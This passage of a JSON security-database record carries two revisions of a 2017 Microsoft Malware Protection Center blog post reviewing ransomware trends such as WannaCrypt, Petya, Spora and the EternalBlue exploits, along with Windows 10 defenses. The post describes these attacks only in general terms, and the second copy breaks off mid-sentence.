"THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27613"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2019-01-23T05:28:27", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.threatpost.ThreatpostBulletin", "_object_types": ["robots.models.threatpost.ThreatpostBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}], "mmpc": [{"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/", "references": [], "enchantments_done": [], "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "id": "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "history": [{"bulletin": {"bulletinFamily": "blog", "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "In the first six months of 2017, [ransomware](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>) threats reached new levels of sophistication. The same period also saw the reversal of a [six-month downward trend](<https://blogs.technet.microsoft.com/mmpc/2017/02/14/ransomware-2016-threat-landscape-review/>) in ransomware encounters. New ransomware code was released at a higher rate with increasing complexity. Two high-profile ransomware incidents brought cybersecurity to the forefront of mainstream conversations as the impact of attacks was felt around the world by organizations and individuals alike.\n\nThe recently released [Microsoft Security Intelligence Report](<https://blogs.microsoft.com/microsoftsecure/2017/08/17/microsoft-security-intelligence-report-volume-22-is-now-available/>) summarizing movements in different areas of the threat landscape in the first quarter of the year showed the continued global presence of ransomware. The highest encounter rates, defined as the percentage of computers running Microsoft real-time security products that report blocking or detecting ransomware, were registered in the Czech Republic, Korea, and Italy from January to March 2017.\n\nSustained ransomware campaigns and high-profile attacks continued to highlight the need for advanced comprehensive cybersecurity strategy. In this blog entry, we share our key observations on the ransomware landscape and offer insights on what can be learned from trends and developments so far in 2017.\n\n## Ransomware growth rallies\n\nIn March of 2017, the volume of ransomware encounters started to pick up again after several months of decline. The growth is driven to a certain extent by sustained activities from established ransomware operations like [Cerber](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Cerber>), with an onslaught of attacks powered by [ransomware-as-a-service](<https://www.microsoft.com/en-us/wdsi/help/antimalware-security-glossary#ransomware-as-a-service>).\n\n\n\n_Figure 1. Total ransomware encounters by month, July 2016-June 2017 (source: _[_Ransomware FAQ page_](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>)_)_\n\nIn part, this surge is also driven by the emergence of new ransomware families, which are being released into the wild at a faster rate. In the first half of 2017, we discovered 71 new ransomware families, an increase from the 64 new families we found in the same period in 2016.\n\nSome of these new ransomware families stand out because they exhibit new behaviors that make them more complex. For instance, the latest [Microsoft Security Intelligence Report](<https://blogs.microsoft.com/microsoftsecure/2017/08/17/microsoft-security-intelligence-report-volume-22-is-now-available/>) shows that in March 2017, two-month old [Spora](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Spora.A>) overtook Cerber as the most prevalent ransomware family.\n\n\n\n_Figure 2. Trends for several commonly encountered ransomware families in 1Q17, by month (source: _[_Microsoft Security Intelligence Report 22_](<https://www.microsoft.com/en-us/security/intelligence-report>)_)_\n\nSpora\u2019s quick rise to the top may be traced to its capability to spread via network drives and removable drives, such as USB sticks. Initial versions targeted Russia and featured a ransom note in the local language. It has since gone global, spreading to other countries with a ransom note in English.\n\nOther notable new ransomware families in 2017 include [Jaffrans](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Jaffrans>), [Exmas](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Exmas>), and [Ergop](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Ergop.A>). While these families have not quite achieved the prevalence of Spora, they show signs of persistence and periodic improvements that are observed in older, successful families.\n\nMicrosoft protects customers from new and emerging ransomware like Spora using a combination of advanced heuristics, generics, and machine learning, which work together to deliver predictive, real-time protection. In a recent blog post, we demonstrated how we could better [protect from never-before-seen ransomware](<https://blogs.technet.microsoft.com/mmpc/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware/>) with enhancements to the Windows Defender Antivirus cloud protection service.\n\n## The rise of global ransomware outbreaks\n\n[WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>) (also known as WannaCry) is one of the most well-known new ransomware to surface so far this year. It emerged in May carrying an exploit for a patched vulnerability and quickly spread to out-of-date Windows 7 computers in Europe and later the rest of the world (the exploit did not affect Windows 10). The attack left several impacted organizations, high-tech facilities, and other services affected in its aftermath.\n\nOnly a few weeks after the WannaCrypt outbreak, a new variant of [Petya](<https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/>) wreaked havoc in June. This Petya variant applied some of the propagation techniques used by WannaCrypt, but incorporated more methods to spread within a network. The outbreak started in Ukraine, where a compromised supply-chain delivered the ransomware through a software update process. The Petya infections swiftly spread to other countries in the course of a few hours. Petya\u2019s impact was not as widespread as the WannaCrypt outbreak; however, as our [in-depth analysis of Petya](<https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/>) revealed, its upgrades made it so much more complex and caused more damage to organizations affected.\n\nWannaCrypt and Petya defied the trend of more targeted and localized attacks and became the first global malware attacks in quite a while. They generated worldwide mainstream interest. Interestingly, this attention might have added more challenges for attackers. For instance, the Bitcoin wallets used in these attacks were closely monitored by security researchers.\n\nWannaCrypt and Petya showed that ransomware attacks powered by sophisticated exploits on a global scale can be particularly catastrophic. Global attacks emphasize the need to [avert ransomware epidemics](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>) by enabling responders to detect, respond to, and investigate attacks so infections can be contained and not allowed to swell. [Security patches](<https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>) need to be applied as soon as they become available.\n\n\n\n_Figure 3. Global distribution of ransomware encounters by month, January-June 2017_\n\n## Increasing sophistication\n\nThe trend of global outbreaks is likely a result of more techniques incorporated by ransomware. WannaCrypt, Petya, Spora, and other new ransomware variants sported new capabilities that allowed them to spread faster and wreak more havoc than other malware.\n\n### Lateral movement using exploits\n\nSpora\u2019s aforementioned ability to spread via network drives and removable drives made it one of the most widespread ransomware. Though it was not the first ransomware family to integrate a worm-like spreading mechanism, it was able to use this capability to infect more computers.\n\nWith worm capabilities, ransomware attacks can have implications beyond endpoint security, introducing challenges to enterprise networks. This was particularly true for WannaCrypt, which spread by exploiting a vulnerability ([CVE-2017-0144](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>), dubbed EternalBlue, previously patched in security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)), affecting networks with out-of-date computers.\n\nPetya expanded on WannaCrypt\u2019s spreading mechanism by exploiting not one, but two vulnerabilities. Apart from CVE-2017-0144, it also exploited [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) (known as EternalRomance, and fixed in the same security update as EternalBlue), affecting out-of-date systems.\n\nThese two attacks highlighted the importance of applying security patches as they become available. They likewise highlight the importance of immediately detecting and stopping malicious behavior related to exploits.\n\nIt is important to note that the EternalBlue and EternalRomance exploits did not affect Windows 10, underscoring the benefits of upgrading to the latest, most secure version of platforms and software. Even if the exploits were designed to work on Windows 10, the platform has multiple [mitigations against exploits](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>), including [zero-days](<https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/>). In addition, Windows Defender Advanced Threat Protection ([Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>)) [detects malicious activities resulting from exploits](<https://blogs.technet.microsoft.com/mmpc/2017/06/30/exploring-the-crypt-analysis-of-the-wannacrypt-ransomware-smb-exploit-propagation/>) without the need for signature updates.\n\n### Credential theft\n\nOne of Petya\u2019s more noteworthy behaviors is its credential-stealing capability, which it does either by using a credential dumping tool or by stealing from the Credential Store. This capability poses a significant security challenge for networks with users who sign in with local admin privileges and have active sessions opens across multiple machines. In this situation, stolen credentials can provide the same level of access the users have on other machines.\n\nThe Petya outbreak is testament to the importance of credential hygiene. Enterprises need to constantly review privileged accounts, which have unhampered network access and access to corporate secrets and other critical data. [Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) uses virtualization-based security to protect derived domain credentials and stop attempts to compromise privileged accounts.\n\n### Network scanning\n\nArmed with exploits or stolen credentials, ransomware can spread across networks through network scanning. For example, Petya scanned affected networks to establish valid connections to other computers. It then attempted to transfer copies of the malware using stolen credentials. Petya also scanned for network shares in an attempt to spread through those shares.\n\nWannaCrypt, on the other hand, ran massive scanning of IP addresses to look for computers that are vulnerable to the EternalBlue exploit. This gave it the ability to spread to out-of-date computers outside the network. Network defenders can uncover and stop unauthorized network scanning behaviors.\n\n### Destructive behavior\n\nIn most ransomware cases, the attacker motivation is clear: victims need to pay the ransom or never gain back access to encrypted files. While there is no guarantee that files are decrypted after payment is made, most ransomware infections make their intention clear through a ransom note. In August, WannaCrypt actors wrapped up their campaign by [withdrawing ransom pain in Bitcoins from online wallets](<http://www.bbc.com/news/technology-40811972>).\n\nPetya behaved like other ransomware in this aspect. Attackers [emptied the Petya online wallets](<https://www.theguardian.com/technology/2017/jul/05/notpetya-ransomware-hackers-ukraine-bitcoin-ransom-wallet-motives>) earlier in July. However, Petya had far more destructive routines: it overwrote or damaged the Master Boot Record (MBR) and Volume Boot Record (VBR), rendering affected computers unusable. This started a conversation about whether this Petya variant was primarily a ransomware like WannaCrypt or a destructive cyberattack like [Depriz](<https://blogs.technet.microsoft.com/mmpc/2016/12/09/windows-10-protection-detection-and-response-against-recent-attacks/>) (also known as Shamoon).\n\n\n\n_Figure 4. Petya incorporated complex behaviors not typical of ransomware_\n\nThe debate is not settled, but the Petya attack does raise an important point\u2014attackers can easily incorporate other payloads into ransomware code to facilitate [targeted attacks](<https://krebsonsecurity.com/2016/09/ransomware-getting-more-targeted-expensive/>) and other types of destructive cyberattacks. As the threat of ransomware escalates, enterprises and individuals alike need a sound cybersecurity strategy and a protection suite that will defend against the end-to-end ransomware infection process.\n\n## Integrated end-to-end security suite against ransomware\n\nWith high-profile global outbreaks and other notable trends, the first six months of 2017 can be considered one of the more turbulent periods in the history of ransomware. The observations we summarized in this blog highlight the potency of the ransomware threat. Unfortunately, given the trends, we may see similarly sophisticated or even more complex attacks in the foreseeable future. More importantly, however, we should learn from these attacks and developments, because they highlight the areas of cybersecurity that need to be improved and reevaluated.\n\nAt Microsoft, we\u2019re always hard at work to continuously harden Windows 10 against ransomware and other attacks. In the upcoming [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>), we will integrate Microsoft security solutions into a powerful single pane of glass\u2014centralized management that will allow customers to consume, manage, and integrate security for devices in the network. Windows Defender ATP will be expanded to include seamless integration across the entire Windows protection stack. The suite of tools will include the new Windows Defender Exploit Guard and Windows Defender Application Guard, as well as the enhanced Windows Defender Device Guard and Windows Defender AV.\n\nToday, Windows 10 Creators Update has [next-gen technologies that protect against ransomware attacks](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>).\n\n\n\n_Figure 5. Windows 10 end-to-end protection stack (source: _[_Next-gen ransomware protection with Windows 10 Creators Update_](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>)_)_\n\nWindows 10 has [multiple exploit mitigations](<https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/>), including control flow-guard for kernel (kFCG), kernel mode code integrity (KMCI), better kernel address space layout randomization (KASLR), NX HAL, and PAGE POOL (non-executable kernel regions). These mitigations help make [Windows 10 resilient](<https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/>) to exploit attacks, such as those used by WannaCrypt and Petya.\n\n### Intelligent Security Graph and machine learning\n\nSecurity built into Windows 10 is powered by the Microsoft [Intelligent Security Graph](<https://t.co/UpWPG34Kwy>), which correlates signals from billions of sensors. Unique insights from this vast security intelligence enable Microsoft to deliver real-time protection through [Windows Defender AV](<https://www.microsoft.com/en-us/windows/windows-defender>), [Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>), and other next-gen security technologies.\n\nThe increasing magnitude and complexity of ransomware require advanced real-time protection. [Windows Defender AV](<https://www.microsoft.com/en-us/windows/windows-defender>) uses precise [machine learning models](<https://blogs.technet.microsoft.com/mmpc/2017/05/08/antivirus-evolved/>) as well as generic and heuristic techniques, improved detection of script-based ransomware, and enhanced behavior analysis to detect common and complex ransomware code. Using the cloud protection service, Windows Defender AV provides real-time protection. In recent enhancements, the [cloud protection service can make a swift assessment](<https://blogs.technet.microsoft.com/mmpc/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware/>) of new and unknown files, allowing Windows Defender AV to block new malware the first time it is seen.\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>) empowers SecOps personnel to [stop ransomware outbreaks](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>) in the network. Both WannaCrypt and Petya showed how critical it is to detect, investigate, and respond to ransomware attacks and prevent the spread. Windows Defender ATP\u2019s enhanced behavioral and [machine learning detection libraries](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>) flag malicious behavior across the ransomware infection process. The new process tree visualization and improvements in machine isolation further help security operations to investigate and respond to ransomware attacks.\n\n### Online safety with Microsoft Edge and Office 365 Advanced Threat Protection\n\n[Microsoft Edge](<https://docs.microsoft.com/en-us/microsoft-edge/deploy/index>) can help block ransomware infections from the web by opening pages within app container boxes. It uses reputation-based blocking of downloads. Its click-to-run feature for Flash can stop ransomware infections that begin with exploit kits.\n\nTo defend against ransomware attacks that begin with email, [Microsoft Exchange Online Protection (EOP)](<https://products.office.com/en-us/exchange/exchange-email-security-spam-protection>) uses built-in anti-spam filtering capabilities that help protect Office 365 customers. [Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection>) helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection. Outlook.com anti-spam filters also provide protection against malicious emails.\n\n### Virtualization-based security and application control\n\n[Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) can protect domain credentials from attacks like Petya, which attempted to steal credentials for use in lateral movement. Credential Guard uses virtualization-based security to protect against credential dumping.\n\nEnterprises can implement virtualization-based lockdown security, which can block all types of unauthorized content. [Windows Defender Device Guard](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/introduction-to-device-guard-virtualization-based-security-and-code-integrity-policies>) combines virtualization-based security and application control to allow only authorized apps to run. Petya, whose first infections were traced back to a compromised software update process, was blocked on devices with Device Guard enabled.\n\n### Microsoft-vetted security with Windows 10 S and more security features in Windows 10 Fall Creators Update\n\nDevices can achieve a similar lockdown security with [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s>), which streamlines security and performance by working exclusively with apps from the Windows Store, ensuring that only apps that went through the Store onboarding, vetting, and signing process are allowed to run.\n\nAll of these security features make Windows 10 our most secure platform. Next-gen security technologies in Windows 10 provide next-gen protection against ransomware.\n\n\n\n_Figure 6. Windows 10 next-gen security _\n\nBut the work to further harden Windows 10 against ransomware and other threats continues. Expect more security features and capabilities in the upcoming [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>).\n\n \n\n**_Tanmay Ganacharya (_**[**@tanmayg**](<https://twitter.com/tanmayg>)**_)_**\n\n_Principal Group Manager, Windows Defender Research_\n\n#### \n\n \n\n* * *\n\n#### **Talk to us**\n\nQuestions, concerns, or insights on this story? Join discussions at the [Microsoft community](<https://answers.microsoft.com/en-us/protect>).\n\nFollow us on Twitter [@MMPC](<https://twitter.com/msftmmpc>) and Facebook [Microsoft Malware Protection Center](<https://www.facebook.com/msftmmpc/>)", "enchantments": {}, "history": [], "href": "https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/", "id": "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "lastseen": "2017-09-06T16:03:51", "modified": "2017-09-06T14:58:36", "objectVersion": "1.4", "published": "2017-09-06T14:58:36", "references": [], "reporter": "msft-mmpc", "title": "Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene", "type": "mmpc", "viewCount": 27}, "differentElements": ["description"], "edition": 1, "lastseen": "2017-09-06T16:03:51"}, {"bulletin": {"bulletinFamily": "blog", "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "description": "In the first six months of 2017, [ransomware](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>) threats reached new levels of sophistication. The same period also saw the reversal of a [six-month downward trend](<https://blogs.technet.microsoft.com/mmpc/2017/02/14/ransomware-2016-threat-landscape-review/>) in ransomware encounters. New ransomware code was released at a higher rate with increasing complexity. Two high-profile ransomware incidents brought cybersecurity to the forefront of mainstream conversations as the impact of attacks was felt around the world by organizations and individuals alike.\n\nThe recently released [Microsoft Security Intelligence Report](<https://blogs.microsoft.com/microsoftsecure/2017/08/17/microsoft-security-intelligence-report-volume-22-is-now-available/>) summarizing movements in different areas of the threat landscape in the first quarter of the year showed the continued global presence of ransomware. The highest encounter rates, defined as the percentage of computers running Microsoft real-time security products that report blocking or detecting ransomware, were registered in the Czech Republic, Korea, and Italy from January to March 2017.\n\nSustained ransomware campaigns and high-profile attacks continued to highlight the need for advanced comprehensive cybersecurity strategy. In this blog entry, we share our key observations on the ransomware landscape and offer insights on what can be learned from trends and developments so far in 2017.\n\n\n\n_Figure 1. Global distribution of ransomware encounters by month, January-June 2017_\n\n## Ransomware growth rallies\n\nIn March of 2017, the volume of ransomware encounters started to pick up again after several months of decline. The growth is driven to a certain extent by sustained activities from established ransomware operations like [Cerber](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Cerber>), with an onslaught of attacks powered by [ransomware-as-a-service](<https://www.microsoft.com/en-us/wdsi/help/antimalware-security-glossary#ransomware-as-a-service>).\n\n\n\n_Figure 2. Total ransomware encounters by month, July 2016-June 2017 (source: _[_Ransomware FAQ page_](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>)_)_\n\nIn part, this surge is also driven by the emergence of new ransomware families, which are being released into the wild at a faster rate. In the first half of 2017, we discovered 71 new ransomware families, an increase from the 64 new families we found in the same period in 2016.\n\nSome of these new ransomware families stand out because they exhibit new behaviors that make them more complex. For instance, the latest [Microsoft Security Intelligence Report](<https://blogs.microsoft.com/microsoftsecure/2017/08/17/microsoft-security-intelligence-report-volume-22-is-now-available/>) shows that in March 2017, two-month old [Spora](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Spora.A>) overtook Cerber as the most prevalent ransomware family.\n\n\n\n_Figure 3. Trends for several commonly encountered ransomware families in 1Q17, by month (source: _[_Microsoft Security Intelligence Report 22_](<https://www.microsoft.com/en-us/security/intelligence-report>)_)_\n\nSpora\u2019s quick rise to the top may be traced to its capability to spread via network drives and removable drives, such as USB sticks. Initial versions targeted Russia and featured a ransom note in the local language. It has since gone global, spreading to other countries with a ransom note in English.\n\nOther notable new ransomware families in 2017 include [Jaffrans](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Jaffrans>), [Exmas](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Exmas>), and [Ergop](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Ergop.A>). While these families have not quite achieved the prevalence of Spora, they show signs of persistence and periodic improvements that are observed in older, successful families.\n\nMicrosoft protects customers from new and emerging ransomware like Spora using a combination of advanced heuristics, generics, and machine learning, which work together to deliver predictive, real-time protection. In a recent blog post, we demonstrated how we could better [protect from never-before-seen ransomware](<https://blogs.technet.microsoft.com/mmpc/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware/>) with enhancements to the Windows Defender Antivirus cloud protection service.\n\n## The rise of global ransomware outbreaks\n\n[WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>) (also known as WannaCry) is one of the most well-known new ransomware to surface so far this year. It emerged in May carrying an exploit for a patched vulnerability and quickly spread to out-of-date Windows 7 computers in Europe and later the rest of the world (the exploit did not affect Windows 10). The attack left several impacted organizations, high-tech facilities, and other services affected in its aftermath.\n\nOnly a few weeks after the WannaCrypt outbreak, a new variant of [Petya](<https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/>) wreaked havoc in June. This Petya variant applied some of the propagation techniques used by WannaCrypt, but incorporated more methods to spread within a network. The outbreak started in Ukraine, where a compromised supply-chain delivered the ransomware through a software update process. The Petya infections swiftly spread to other countries in the course of a few hours. Petya\u2019s impact was not as widespread as the WannaCrypt outbreak; however, as our [in-depth analysis of Petya](<https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/>) revealed, its upgrades made it so much more complex and caused more damage to organizations affected.\n\nWannaCrypt and Petya defied the trend of more targeted and localized attacks and became the first global malware attacks in quite a while. They generated worldwide mainstream interest. Interestingly, this attention might have added more challenges for attackers. For instance, the Bitcoin wallets used in these attacks were closely monitored by security researchers.\n\nWannaCrypt and Petya showed that ransomware attacks powered by sophisticated exploits on a global scale can be particularly catastrophic. Global attacks emphasize the need to [avert ransomware epidemics](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>) by enabling responders to detect, respond to, and investigate attacks so infections can be contained and not allowed to swell. [Security patches](<https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>) need to be applied as soon as they become available.\n\n## Increasing sophistication\n\nThe trend of global outbreaks is likely a result of more techniques incorporated by ransomware. WannaCrypt, Petya, Spora, and other new ransomware variants sported new capabilities that allowed them to spread faster and wreak more havoc than other malware.\n\n### Lateral movement using exploits\n\nSpora\u2019s aforementioned ability to spread via network drives and removable drives made it one of the most widespread ransomware. Though it was not the first ransomware family to integrate a worm-like spreading mechanism, it was able to use this capability to infect more computers.\n\nWith worm capabilities, ransomware attacks can have implications beyond endpoint security, introducing challenges to enterprise networks. This was particularly true for WannaCrypt, which spread by exploiting a vulnerability ([CVE-2017-0144](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>), dubbed EternalBlue, previously patched in security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)), affecting networks with out-of-date computers.\n\nPetya expanded on WannaCrypt\u2019s spreading mechanism by exploiting not one, but two vulnerabilities. Apart from CVE-2017-0144, it also exploited [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) (known as EternalRomance, and fixed in the same security update as EternalBlue), affecting out-of-date systems.\n\nThese two attacks highlighted the importance of applying security patches as they become available. They likewise highlight the importance of immediately detecting and stopping malicious behavior related to exploits.\n\nIt is important to note that the EternalBlue and EternalRomance exploits did not affect Windows 10, underscoring the benefits of upgrading to the latest, most secure version of platforms and software. Even if the exploits were designed to work on Windows 10, the platform has multiple [mitigations against exploits](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>), including [zero-days](<https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/>). In addition, Windows Defender Advanced Threat Protection ([Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>)) [detects malicious activities resulting from exploits](<https://blogs.technet.microsoft.com/mmpc/2017/06/30/exploring-the-crypt-analysis-of-the-wannacrypt-ransomware-smb-exploit-propagation/>) without the need for signature updates.\n\n### Credential theft\n\nOne of Petya\u2019s more noteworthy behaviors is its credential-stealing capability, which it does either by using a credential dumping tool or by stealing from the Credential Store. This capability poses a significant security challenge for networks with users who sign in with local admin privileges and have active sessions opens across multiple machines. In this situation, stolen credentials can provide the same level of access the users have on other machines.\n\nThe Petya outbreak is testament to the importance of credential hygiene. Enterprises need to constantly review privileged accounts, which have unhampered network access and access to corporate secrets and other critical data. [Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) uses virtualization-based security to protect derived domain credentials and stop attempts to compromise privileged accounts.\n\n### Network scanning\n\nArmed with exploits or stolen credentials, ransomware can spread across networks through network scanning. For example, Petya scanned affected networks to establish valid connections to other computers. It then attempted to transfer copies of the malware using stolen credentials. Petya also scanned for network shares in an attempt to spread through those shares.\n\nWannaCrypt, on the other hand, ran massive scanning of IP addresses to look for computers that are vulnerable to the EternalBlue exploit. This gave it the ability to spread to out-of-date computers outside the network. Network defenders can uncover and stop unauthorized network scanning behaviors.\n\n### Destructive behavior\n\nIn most ransomware cases, the attacker motivation is clear: victims need to pay the ransom or never gain back access to encrypted files. While there is no guarantee that files are decrypted after payment is made, most ransomware infections make their intention clear through a ransom note. In August, WannaCrypt actors wrapped up their campaign by [withdrawing ransom pain in Bitcoins from online wallets](<http://www.bbc.com/news/technology-40811972>).\n\nPetya behaved like other ransomware in this aspect. Attackers [emptied the Petya online wallets](<https://www.theguardian.com/technology/2017/jul/05/notpetya-ransomware-hackers-ukraine-bitcoin-ransom-wallet-motives>) earlier in July. However, Petya had far more destructive routines: it overwrote or damaged the Master Boot Record (MBR) and Volume Boot Record (VBR), rendering affected computers unusable. This started a conversation about whether this Petya variant was primarily a ransomware like WannaCrypt or a destructive cyberattack like [Depriz](<https://blogs.technet.microsoft.com/mmpc/2016/12/09/windows-10-protection-detection-and-response-against-recent-attacks/>) (also known as Shamoon).\n\n\n\n_Figure 4. Petya incorporated complex behaviors not typical of ransomware_\n\nThe debate is not settled, but the Petya attack does raise an important point\u2014attackers can easily incorporate other payloads into ransomware code to facilitate [targeted attacks](<https://krebsonsecurity.com/2016/09/ransomware-getting-more-targeted-expensive/>) and other types of destructive cyberattacks. As the threat of ransomware escalates, enterprises and individuals alike need a sound cybersecurity strategy and a protection suite that will defend against the end-to-end ransomware infection process.\n\n## Integrated end-to-end security suite against ransomware\n\nWith high-profile global outbreaks and other notable trends, the first six months of 2017 can be considered one of the more turbulent periods in the history of ransomware. The observations we summarized in this blog highlight the potency of the ransomware threat. Unfortunately, given the trends, we may see similarly 